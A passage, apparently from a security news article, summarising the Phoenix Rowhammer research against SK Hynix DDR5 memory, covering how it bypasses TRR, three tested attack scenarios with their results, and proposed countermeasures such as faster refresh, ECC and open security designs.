The researchers then studied these vulnerable points in detail to deliver a highly targeted strike on memory cells while knocking out the defenses. Put simply, the attack works like this: malicious code performs a series of dummy accesses that effectively lull the TRR mechanism into a false sense of security. Then the active phase of the attack occurs, which ultimately modifies the target cell value. As a result, the team confirmed that the attack reliably worked against all 15 tested DDR5 modules manufactured by SK Hynix, one of the market leaders.

Three real-world attack scenarios

A realistic attack must change a value in a precisely defined memory region — a difficult task. Firstly, an attacker needs detailed knowledge of the target software. They must bypass multiple conventional security controls, and missing the target by just one or two bits can result in a system crash instead of a successful hack.

The Swiss researchers set out to prove that Phoenix could be used to cause real-world damage. They evaluated three attack scenarios. The first (PTE) involved accessing the page table to create conditions for arbitrary reading/writing of RAM data. The second (RSA) aimed to steal an RSA-2048 private encryption key from memory. The third (sudo) involved bypassing the protections of the standard Linux sudo utility with the aim of privilege escalation. The study’s final results are shown in this table:

[phoenix-rowhammer-attack-results.jpg]

For some modules, the first attack variant (128 refresh intervals) was effective, while for others only the second (2608 intervals) method worked. In some experiments the RSA key theft and sudo exploits didn’t succeed. However, a method for arbitrary memory read/write was found for all modules, and the exploitation time was relatively short for this class of attacks — from about five seconds up to seven minutes. That’s enough to demonstrate that Rowhammer attacks pose a real risk, albeit in a highly constrained set of scenarios.

Relevance and countermeasures

The Phoenix attack shows that Rowhammer-style attacks can be carried out against DDR5 modules just as effectively as on DDR4 and DDR3. Though modules from a just single vendor were tested and the researchers uncovered a fairly simple weakness in that vendor’s TRR algorithm that will most likely be easy to fix, this is a significant step forward in the security research of memory modules.

The authors proposed several countermeasures against Rowhammer-type attacks. First, reducing the enforced refresh interval across all cells can significantly impede the attack. This may increase power consumption and chip temperature, but it’s a straightforward solution. Second, memory with an error correction code (ECC) can be used. This complicates Rowhammer attacks, although — somewhat paradoxically — it doesn’t make them completely impossible.

Beyond these obvious measures, the authors mention two more. The first is the Fine Granularity Refresh protection method, which is already being implemented. Built into the processor’s memory controller, it modifies memory-cell refresh behavior in order to resist Rowhammer attacks. As for the second, the researchers urge memory-module and chip developers to stop relying on proprietary security measures (“security through obscurity”). Instead, they recommend adopting an approach common in cryptography — where security algorithms are publicly available and subject to independent testing.

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